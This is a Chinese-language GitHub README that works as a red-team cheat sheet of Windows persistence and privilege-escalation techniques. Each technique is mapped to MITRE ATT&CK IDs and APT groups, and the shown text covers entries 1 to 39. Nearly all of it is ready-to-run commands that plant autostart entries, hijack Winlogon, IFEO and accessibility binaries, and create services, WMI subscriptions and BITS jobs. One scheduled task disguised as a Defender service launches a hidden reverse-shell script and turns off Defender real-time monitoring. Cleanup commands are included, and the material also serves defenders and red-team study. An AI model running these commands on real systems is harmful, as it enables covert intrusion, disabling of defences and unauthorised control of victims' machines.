manikandantn68/window-persistence-Privilege-Escalation
GitHub: manikandantn68/window-persistence-Privilege-Escalation
汇集 67 种 Windows 持久化与提权技术的实战速查手册,包含 MITRE ATT&CK 映射、APT 归因、攻击命令与清理步骤。
Stars: 11 | Forks: 0
# Windows 持久化、权限提升与后渗透 — 完整参考
## 快速索引 — 持久化技术
| # | 技术 | 管理员权限 | MITRE TTP | ATT&CK ID |
|---|-----------|:-----:|-----------|-----------|
| 1 | 启动文件夹 — EXE 复制 | ❌ | 启动或登录自动运行: 启动文件夹 | T1547.001 |
| 2 | 启动文件夹 — LNK 快捷方式 | ❌ | 启动或登录自动运行: 启动文件夹 | T1547.001 |
| 3 | 所有用户启动 | ✅ | 启动或登录自动运行: 启动文件夹 | T1547.001 |
| 4 | 计划任务 (schtasks 基础) | ❌ | 计划任务/作业: 计划任务 | T1053.005 |
| 5 | 计划任务 XML — 单个操作 | ❌ | 计划任务/作业: 计划任务 | T1053.005 |
| 6 | 计划任务 XML — 多个操作 | ❌ | 计划任务/作业: 计划任务 | T1053.005 |
| 7 | At.exe 旧版计划程序 | ❌ | 计划任务/作业: At | T1053.002 |
| 8 | 注册表 Run 键 | ❌ | 启动或登录自动运行: 注册表 Run 键 | T1547.001 |
| 9 | Explorer 策略 Run 键 | ❌ | 启动或登录自动运行: 注册表 Run 键 | T1547.001 |
| 10 | Explorer Load 键 | ❌ | 启动或登录自动运行: 注册表 Run 键 | T1547.001 |
| 11 | CMD AutoRun | ❌ | 启动或登录自动运行: 注册表 Run 键 | T1547.001 |
| 12 | 环境变量 | ❌ | 修改注册表 | T1112 |
| 13 | 登录脚本 (UserInitMprLogonScript) | ❌ | 启动或登录初始化脚本: 登录脚本 | T1037.001 |
| 14 | 登录 BAT 脚本 | ❌ | 启动或登录初始化脚本: 登录脚本 | T1037.001 |
| 15 | StartupApproved 绕过 | ❌ | 启动或登录自动运行: 启动文件夹 | T1547.001 |
| 16 | IFEO 调试器劫持 | ✅ | 事件触发: IFEO 注入 | T1546.012 |
| 17 | SilentProcessExit | ✅ | 事件触发: IFEO 注入 | T1546.012 |
| 18 | Userinit 劫持 | ✅ | 启动或登录自动运行: Winlogon Helper DLL | T1547.004 |
| 19 | Shell 劫持 | ✅ | 启动或登录自动运行: Winlogon Helper DLL | T1547.004 |
| 20 | Winlogon MPNotify | ✅ | 启动或登录自动运行: Winlogon Helper DLL | T1547.004 |
| 21 | Active Setup | ✅ | 启动或登录自动运行: Active Setup | T1547.014 |
| 22 | 启动执行 | ✅ | 预启动阶段: Bootkit (会话管理器) | T1542.003 |
| 23 | 终端服务器初始程序 (RDP) | ✅ | 远程服务: 远程桌面协议 | T1021.001 |
| 24 | 辅助功能劫持 (sethc / utilman) | ✅ | 事件触发: 辅助功能 | T1546.008 |
| 25 | 屏幕保护程序 (SCRNSAVE.EXE) | ❌ | 事件触发: 屏幕保护程序 | T1546.002 |
| 26 | 屏幕保护程序路径劫持 | ❌ | 事件触发: 屏幕保护程序 | T1546.002 |
| 27 | Shell Open Command 劫持 | ❌ | 事件触发: 更改默认文件关联 | T1546.001 |
| 28 | PATH 劫持 | ❌ | 劫持执行流: 路径拦截 | T1574.007 |
| 29 | 快捷方式劫持 | ❌ | 启动或登录自动运行: 快捷方式修改 | T1547.009 |
| 30 | 回收站持久化 | ❌ | 启动或登录自动运行: 注册表 Run 键 | T1547.001 |
| 31 | PowerShell 配置文件 | ❌ | 事件触发: PowerShell 配置文件 | T1546.013 |
| 32 | 新建服务 | ✅ | 创建或修改系统进程: Windows 服务 | T1543.003 |
| 33 | 修改现有服务 | ✅ | 创建或修改系统进程: Windows 服务 | T1543.003 |
| 34 | 服务故障恢复 | ✅ | 创建或修改系统进程: Windows 服务 | T1543.003 |
| 35 | BITS 作业持久化 | ❌ | BITS 作业 | T1197 |
| 36 | 磁盘清理 COM 处理程序 | ❌ | 事件触发: 组件对象模型劫持 | T1546.015 |
| 37 | Windows 错误报告 | ✅ | 事件触发: IFEO 注入 | T1546.012 |
| 38 | 应用程序 Shim (AppCompat) | ✅ | 事件触发: 应用程序 Shimming | T1546.011 |
| 39 | WMI 事件订阅 | ✅ | 事件触发: WMI 事件订阅 | T1546.003 |
| 40 | 隐藏用户账户 | ✅ | 创建账户: 本地账户 | T1136.001 |
| 41 | fodhelper UAC 绕过 | ❌ | 滥用提权控制: 绕过 UAC | T1548.002 |
| 42 | WSL 持久化 | ❌ | 命令和脚本解释器: Unix Shell | T1059.004 |
| 43 | DPAPI CurrentUser 注册表 | ❌ | 混淆文件: 加密/编码文件 | T1027.013 |
| 44 | DPAPI 计算机范围 | ✅ | 混淆文件: 加密/编码文件 | T1027.013 |
| 45 | AES 加密注册表加载器 | ❌ | 混淆文件: 加密/编码文件 | T1027.013 |
| 46 | XOR 混淆 + DPAPI + RunKey | ❌ | 混淆文件 + 注册表 Run 键 | T1027 + T1547.001 |
| **— 基于 DLL 的技术 —** | | | | |
| 47 | AppInit_DLLs | ✅ | 事件触发: AppInit DLLs | T1546.010 |
| 48 | COM DLL 劫持 (HKCU 覆盖) | ❌ | 事件触发: COM 对象劫持 | T1546.015 |
| 49 | 服务 DLL — svchost.exe | ✅ | 创建或修改系统进程: Windows 服务 | T1543.003 |
| 50 | Winlogon 通知包 DLL | ✅ | 启动或登录自动运行: Winlogon Helper DLL | T1547.004 |
| 51 | LSA 安全支持提供程序 (SSP) DLL | ✅ | 启动或登录自动运行: 安全支持提供程序 | T1547.005 |
| 52 | rundll32 + RunKey (反射式 DLL) | ❌ | 启动或登录自动运行: 注册表 Run 键 | T1547.001 |
| 53 | 计划任务 — rundll32 DLL | ❌ | 计划任务/作业: 计划任务 | T1053.005 |
| 54 | 幽灵 DLL 劫持 | ❌ | 劫持执行流: DLL 搜索顺序劫持 | T1574.001 |
| 55 | .NET Profiler DLL (COR_PROFILER) | ❌ | 劫持执行流: COR_PROFILER | T1574.012 |
| 56 | ETW Provider 劫持 DLL | ✅ | 劫持执行流 | T1574 |
| 57 | AMSI Provider DLL | ✅ | 削弱防御: 禁用或修改工具 | T1562.001 |
| 58 | 打印处理器 DLL | ✅ | 启动或登录自动运行: 打印处理器 | T1547.012 |
| 59 | Winsock LSP DLL | ❌ | 劫持执行流 | T1574 |
| 60 | netsh Helper DLL | ✅ | 劫持执行流: DLL 搜索顺序劫持 | T1574.001 |
| 61 | WMI Provider DLL | ✅ | 事件触发: WMI 事件订阅 | T1546.003 |
| 62 | 网络提供程序 DLL | ✅ | 修改身份验证过程: 网络提供程序 DLL | T1556.008 |
| 63 | 密码筛选器 DLL (SAM) | ✅ | 修改身份验证过程: 密码筛选器 DLL | T1556.002 |
| 64 | WinRT DLL 激活 (HKCU) | ❌ | 劫持执行流: DLL 侧加载 | T1574.002 |
| 65 | 凭据提供程序 DLL | ✅ | 启动或登录自动运行: Winlogon Helper DLL | T1547.004 |
| 66 | Shell 扩展 DLL (右键菜单) | ❌ | 劫持执行流: DLL 搜索顺序劫持 | T1574.001 |
| 67 | DiagTrack DLL 劫持 | ❌ | 劫持执行流: DLL 侧加载 | T1574.002 |
## 快速索引 — 权限提升技术
| # | 技术 | 管理员权限 | MITRE TTP | ATT&CK ID |
|---|-----------|:-----:|-----------|-----------|
| 68 | 未加引号的服务路径 | ❌ | 劫持执行流: 未加引号的路径 | T1574.009 |
| 69 | 弱服务二进制文件权限 | ❌ | 劫持执行流: 服务文件权限弱点 | T1574.010 |
| 70 | 弱服务注册表权限 | ❌ | 劫持执行流 | T1574 |
| 71 | AlwaysInstallElevated (MSI) | ❌ | 滥用提权控制 | T1548 |
| 72 | Token 模拟 (PrintSpoofer / GodPotato) | ❌→✅ | 访问令牌操作 | T1134 |
| 73 | SYSTEM 服务中的 DLL 劫持 | ❌ | DLL 搜索顺序劫持 | T1574.001 |
| 74 | SeImpersonatePrivilege 滥用 | ❌→✅ | 访问令牌操作: Token 模拟 | T1134.001 |
| 75 | 存储的凭据滥用 | ❌ | 来自密码存储的凭据 | T1555 |
## 已知 APT 组织对应技术
| 技术 / TTP | 已知 APT 组织 |
|-----------------|-----------------|
| 启动文件夹 (T1547.001) | APT29 (Cozy Bear), APT32 (OceanLotus), Lazarus Group, FIN7 |
| 注册表 Run 键 (T1547.001) | APT28 (Fancy Bear), Turla, Kimsuky, Carbanak |
| 计划任务 (T1053.005) | APT41, Lazarus Group, FIN6, Cobalt Group |
| 登录脚本 (T1037.001) | APT3, APT29 |
| IFEO 调试器劫持 (T1546.012) | Turla, APT3 |
| Winlogon Helper DLL (T1547.004) | APT28, Turla, PLATINUM |
| Active Setup (T1547.014) | APT29 |
| 辅助功能劫持 (T1546.008) | APT3, APT28, CyberArk |
| 屏幕保护程序 (T1546.002) | APT28, OilRig |
| Shell Open Command 劫持 (T1546.001) | Patchwork, Turla |
| 路径拦截 (T1574.007) | APT41, PowerGhost |
| PowerShell 配置文件 (T1546.013) | APT29, Turla |
| Windows 服务 (T1543.003) | APT28, Lazarus Group, FIN7, Carbanak |
| BITS 作业 (T1197) |PT41, APT28, FIN7, BRONZE BUTLER |
| COM 劫持 (T1546.015) | APT28, Turla, BRONZE BUTLER |
| 应用程序 Shimming (T1546.011) | CarbonSpider, FIN7 |
| WMI 事件订阅 (T1546.003) | APT29, APT33, Lazarus Group, Turla |
| 创建账户 (T1136.001) | APT33, OilRig, Lazarus Group |
| UAC 绕过 (T1548.002) | APT29, APT41, Turla |
| 混淆 (T1027) | APT28, APT29, Lazarus Group, APT41 |
| AppInit DLLs (T1546.010) | Turla, APT29 |
| 安全支持提供程序 (T1547.005) | Turla, APT28, PLATINUM |
| DLL 搜索顺序劫持 (T1574.001) | APT41, Lazarus Group, Turla |
| COR_PROFILER (T1574.012) | Lazarus Group, Turla |
| 打印处理器 (T1547.012) | Lazarus Group, APT28 |
| 网络提供程序 DLL (T1556.008) | APT28, Lazarus Group |
| 密码筛选器 DLL (T1556.002) | APT28, Lazarus Group |
| DLL 侧加载 (T1574.002) | APT41, Lazarus Group, APT29 |
## 1. 启动文件夹 — EXE 复制
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** APT29, APT32, Lazarus Group, FIN7
Windows 启动文件夹 = PC 开机时的自动运行列表。放置在其中的任何程序都会自动启动 — 无需手动打开。
```
copy {path} "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
dir "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\"
Get-CimInstance Win32_StartupCommand | Select Name, Command, Location, User
wmic startup get caption,command
# 清理
del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\{filename}"
```
**快速访问:** `Win+R` → `shell:startup`
## 2. 启动文件夹 — LNK 快捷方式
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** APT29, Lazarus Group
```
$WS = New-Object -ComObject WScript.Shell
$SC = $WS.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk")
$SC.TargetPath = "{path}"
$SC.Save()
# 清理
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk"
```
## 3. 所有用户启动
**TTP:** T1547.001 | **管理员权限:** ✅ | **APT:** APT29, FIN7
```
copy "{path}" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
```
**快速访问:** `Win+R` → `shell:common startup`
## 4. 计划任务 (schtasks — 基础)
**TTP:** T1053.005 | **管理员权限:** ❌ | **APT:** APT41, Lazarus Group, FIN6
```
schtasks /create /tn "DemoTasks\OpenCalc" /sc daily /st 10:00 /tr "{path}"
schtasks /query /fo LIST /V
schtasks /query /tn "DemoTasks\OpenCalc" /fo LIST /v
Get-ScheduledTask | Where-Object { $_.TaskPath -notlike "\Microsoft*" } | Format-Table TaskName, TaskPath, State
Get-ScheduledTask | Where-Object {$_.Principal.UserId -eq "SYSTEM"}
# 清理
schtasks /delete /tn "DemoTasks\OpenCalc" /f
```
## 5. 计划任务 XML — 单个操作
**TTP:** T1053.005 | **管理员权限:** ❌ | **APT:** APT41, Lazarus Group
```
@"
Microsoft Corporation
Adobe Flash Sync Service
\AdobeFlashSync
true true
$env:COMPUTERNAME\$env:USERNAME
InteractiveToken
HighestAvailable
true
PT0S
7
{path}
"@ | Out-File "task.xml" -Encoding Unicode
schtasks /create /tn "AdobeFlashSync" /xml "task.xml" /f
schtasks /query /tn "AdobeFlashSync" /fo LIST /v
schtasks /run /tn "AdobeFlashSync"
# 清理
schtasks /delete /tn "AdobeFlashSync" /f
```
**XML 任务文件位置:** `C:\Windows\System32\Tasks\`
## 6. 计划任务 XML — 多个操作
**TTP:** T1053.005 | **管理员权限:** ❌ | **APT:** APT41, Cobalt Group
多操作任务:运行植入体、PS 反向 Shell、复制到启动文件夹、添加 Run 键、禁用 Defender。
```
@"
Microsoft Corporation
Windows Defender Sync Service
true true
PT5M false 2026-01-01T00:00:00
true
1
true PT0S
{path}
powershell.exe
-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\path\to\shell.ps1
cmd.exe
/c copy {path} "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\svchost32.exe"
reg.exe
add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinDefSync" /t REG_SZ /d "{path}" /f
powershell.exe
-WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
"@ | Out-File "multitask.xml" -Encoding Unicode
schtasks /create /tn "WindowsDefenderSync" /xml "multitask.xml" /f
schtasks /run /tn "WindowsDefenderSync"
# 清理
schtasks /delete /tn "WindowsDefenderSync" /f
```
## 7. At.exe 旧版计划程序
**TTP:** T1053.002 | **管理员权限:** ❌ | **APT:** APT28, 较老的威胁行为者
```
at 10:00 /every:M,T,W,Th,F "{path}"
at
at /delete /yes
```
## 8. 注册表 Run 键
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** APT28, Turla, Kimsuky, Carbanak
```
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "MSUpdate" /t REG_SZ /d "{path}" /f
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate
# Machine-wide (admin)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MSUpdate" /t REG_SZ /d "{path}" /f
# 清理
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /f
```
## 9. Explorer 策略 Run 键
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** APT28, Turla
```
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "MSUpdate" /t REG_SZ /d "{path}" /f
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
# 清理
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v MSUpdate /f
```
## 10. Explorer Load 键
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** Turla, BRONZE BUTLER
```
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "{path}" /f
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load
# 清理
reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /f
```
## 11. CMD AutoRun
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** Turla, FIN7
```
reg add "HKCU\Software\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "{path}" /f
reg query "HKCU\Software\Microsoft\Command Processor" /v AutoRun
# 清理
reg delete "HKCU\Software\Microsoft\Command Processor" /v AutoRun /f
```
## 12. 环境变量
**TTP:** T1112 | **管理员权限:** ❌ | **APT:** OilRig, APT28
```
reg add "HKEY_CURRENT_USER\Environment" /v DemoApp /t REG_SZ /d "{path}" /f
# 清理
REG DELETE "HKEY_CURRENT_USER\Environment" /v DemoApp /f
```
## 13. 登录脚本
**TTP:** T1037.001 | **管理员权限:** ❌ | **APT:** APT3, APT29, Lazarus Group
```
reg add "HKCU\Environment" /v "UserInitMprLogonScript" /t REG_SZ /d "{path}" /f
reg query "HKCU\Environment" /v UserInitMprLogonScript
# 清理
reg delete "HKCU\Environment" /v UserInitMprLogonScript /f
```
## 14. 登录 BAT 脚本
**TTP:** T1037.001 | **管理员权限:** ❌ | **APT:** APT3, Kimsuky
```
echo {path} > C:\ProgramData\logon.bat
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\ProgramData\logon.bat" /f
# 清理
reg delete "HKCU\Environment" /v UserInitMprLogonScript /f
del C:\ProgramData\logon.bat
```
## 15. StartupApproved 绕过
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** FIN7
```
copy "{path}" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
$val = [byte[]](0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder" `
-Name "update.exe" -Value $val -Type Binary
# 清理
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder" -Name "update.exe"
```
## 16. IFEO 调试器劫持
**TTP:** T1546.012 | **管理员权限:** ✅ | **APT:** Turla, APT3, PLATINUM
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "{path}" /f
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /f
```
## 17. SilentProcessExit
**TTP:** T1546.012 | **管理员权限:** ✅ | **APT:** Turla, APT3
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "{path}" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /f
```
## 18. Userinit 劫持
**TTP:** T1547.004 | **管理员权限:** ✅ | **APT:** APT28, Turla, PLATINUM
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,{path}" /f
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
# 恢复
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f
```
## 19. Shell 劫持
**TTP:** T1547.004 | **管理员权限:** ✅ | **APT:** APT28, Turla
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,{path}" /f
# 恢复
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe" /f
```
## 20. Winlogon MPNotify
**TTP:** T1547.004 | **管理员权限:** ✅ | **APT:** APT28, PLATINUM
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v mpnotify /t REG_SZ /d "{path}" /f
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v mpnotify /f
```
## 21. Active Setup
**TTP:** T1547.014 | **管理员权限:** ✅ | **APT:** APT29
```
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{EVIL001}" /v StubPath /t REG_SZ /d "{path}" /f
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{EVIL001}" /v Version /t REG_SZ /d "1,0,0,0" /f
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{EVIL001}" /f
```
## 22. 启动执行
**TTP:** T1542.003 | **管理员权限:** ✅ | **APT:** 高级国家级行为者
```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *\0{path}" /f
# 恢复
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v BootExecute /t REG_MULTI_SZ /d "autocheck autochk *" /f
```
## 23. 终端服务器初始程序 (RDP)
**TTP:** T1021.001 | **管理员权限:** ✅ | **APT:** APT33, OilRig, Lazarus Group
```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "{path}" /f
# 清理
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /f
```
## 24. 辅助功能劫持 (sethc / utilman)
**TTP:** T1546.008 | **管理员权限:** ✅ | **APT:** APT3, APT28, CyberArk
```
# sethc.exe = 锁定屏幕上连按 Shift 5 次
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "{path}" /f
# utilman.exe = 锁定屏幕上按 Win+U
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "{path}" /f
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f
```
## 25. 屏幕保护程序 (SCRNSAVE.EXE)
**TTP:** T1546.002 | **管理员权限:** ❌ | **APT:** APT28, OilRig
```
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "{path}" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f
# 恢复
reg add "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "" /f
reg add "HKCU\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "900" /f
reg add "HKCU\Control Panel\Desktop" /v "ScreenSaveActive" /t REG_SZ /d "0" /f
```
## 26. 屏幕保护程序路径劫持
**TTP:** T1546.002 | **管理员权限:** ❌ | **APT:** APT28, OilRig
```
copy "{path}" "%APPDATA%\scrnsave.scr"
reg add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%APPDATA%\scrnsave.scr" /f
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "10" /f
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
# 清理
reg delete "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /f
del "%APPDATA%\scrnsave.scr"
```
## 27. Shell Open Command 劫持
**TTP:** T1546.001 | **管理员权限:** ❌ | **APT:** Patchwork, Turla
```
reg add "HKCU\Software\Classes\txtfile\shell\open\command" /ve /t REG_SZ /d "{path} %1" /f
# 清理
reg delete "HKCU\Software\Classes\txtfile" /f
```
## 28. PATH 劫持
**TTP:** T1574.007 | **管理员权限:** ❌ | **APT:** APT41, PowerGhost
```
$env:PATH -split ";"
copy "{path}" "$env:LOCALAPPDATA\Microsoft\WindowsApps\python.exe"
copy "{path}" "$env:LOCALAPPDATA\Microsoft\WindowsApps\git.exe"
copy "{path}" "$env:LOCALAPPDATA\Microsoft\WindowsApps\node.exe"
where.exe python
# 清理
del "$env:LOCALAPPDATA\Microsoft\WindowsApps\python.exe"
```
## 29. 快捷方式劫持
**TTP:** T1547.009 | **管理员权限:** ❌ | **APT:** Turla, APT32
```
$path = "$env:USERPROFILE\Desktop\Google Chrome.lnk"
$WS = New-Object -ComObject WScript.Shell
$SC = $WS.CreateShortcut($path)
$SC.TargetPath = "{path}"
$SC.IconLocation = "C:\Program Files\Google\Chrome\Application\chrome.exe"
$SC.Save()
# 恢复
$SC.TargetPath = "C:\Program Files\Google\Chrome\Application\chrome.exe"
$SC.Save()
```
## 30. 回收站持久化
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** 自定义/红队
```
$sid = (whoami /user | Select-String "S-1-").ToString().Trim().Split()[-1]
$recyclePath = "C:\`$Recycle.Bin\$sid"
copy "{path}" "$recyclePath\winlogon.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Recycle" /t REG_SZ /d "$recyclePath\winlogon.exe" /f
# 清理
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Recycle" /f
del "$recyclePath\winlogon.exe"
```
## 31. PowerShell 配置文件
**TTP:** T1546.013 | **管理员权限:** ❌ | **APT:** APT29, Turla
```
New-Item -ItemType Directory -Path "$HOME\Documents\WindowsPowerShell" -Force
echo "{path}" > "$HOME\Documents\WindowsPowerShell\profile.ps1"
# 清理
del $HOME\Documents\WindowsPowerShell\profile.ps1
```
## 32. 新建服务
**TTP:** T1543.003 | **管理员权限:** ✅ | **APT:** APT28, Lazarus Group, FIN7, Carbanak
```
sc.exe create UpdateService binPath= "{path}" start= auto
sc.exe query UpdateService
sc.exe start UpdateService
# 清理
sc.exe delete UpdateService
```
## 33. 修改现有服务
**TTP:** T1543.003 | **管理员权限:** ✅ | **APT:** APT28, Carbanak
```
sc config UpdateService binpath= "{path}"
sc stop UpdateService
sc start UpdateService
sc qc UpdateService
```
## 34. 服务故障恢复
**TTP:** T1543.003 | **管理员权限:** ✅ | **APT:** 自定义/红队
```
sc create FakeSvc binPath= "C:\Windows\System32\svchost.exe" start= auto
sc failure FakeSvc reset= 0 actions= run/0
sc failureflag FakeSvc 1
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc\Parameters" /v FailureCommand /t REG_SZ /d "{path}" /f
sc stop FakeSvc
# 清理
sc delete FakeSvc
```
## 35. BITS 作业持久化
**TTP:** T1197 | **管理员权限:** ❌ | **APT:** APT41, APT28, FIN7, BRONZE BUTLER
```
bitsadmin /create /download PersistJob
bitsadmin /addnotifycmdline PersistJob "{path}" ""
bitsadmin /SetNotifyFlags PersistJob 1
bitsadmin /resume PersistJob
bitsadmin /list /allusers /verbose
# 清理
bitsadmin /cancel PersistJob
```
## 36. 磁盘清理 COM 处理程序
**TTP:** T1546.015 | **管理员权限:** ❌ | **APT:** APT28, Turla, BRONZE BUTLER
```
reg add "HKCU\Software\Classes\CLSID\{C0E13E61-0CC6-11d1-BBB6-0060978B2AE6}\InprocServer32" /ve /t REG_SZ /d "{path}" /f
reg add "HKCU\Software\Classes\CLSID\{C0E13E61-0CC6-11d1-BBB6-0060978B2AE6}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Apartment" /f
cleanmgr.exe
# 清理
reg delete "HKCU\Software\Classes\CLSID\{C0E13E61-0CC6-11d1-BBB6-0060978B2AE6}" /f
```
## 37. Windows 错误报告
**TTP:** T1546.012 | **管理员权限:** ✅ | **APT:** 国家级行为者
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /t REG_SZ /d "{path} %ld %ld" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "1" /f
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v Debugger /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v Auto /f
```
## 38. 应用程序 Shim (AppCompat)
**TTP:** T1546.011 | **管理员权限:** ✅ | **APT:** CarbonSpider, FIN7
```
sdbinst.exe evil.sdb
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB"
:: Cleanup
sdbinst.exe -u evil.sdb
```
## 39. WMI 事件订阅
**TTP:** T1546.003 | **管理员权限:** ✅ | **APT:** APT29, APT33, Lazarus Group, Turla
```
$filterArgs = @{
Name = "INFilter"; EventNameSpace = "root\cimv2"; QueryLanguage = "WQL"
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name='wordpad.exe'"
}
$filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments $filterArgs
$consumerArgs = @{ Name = "INConsumer"; CommandLineTemplate = "{path}" }
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments $consumerArgs
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{
Filter = $filter; Consumer = $consumer
}
# 验证
Get-WmiObject -Namespace "root\subscription" -Class __EventFilter
Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer
# 清理
Get-WmiObject -Namespace "root\subscription" -Class __EventFilter -Filter "Name='INFilter'" | Remove-WmiObject
Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer -Filter "Name='INConsumer'" | Remove-WmiObject
Get-WmiObject -Namespace "root\subscription" -Class __FilterToConsumerBinding | Remove-WmiObject
```
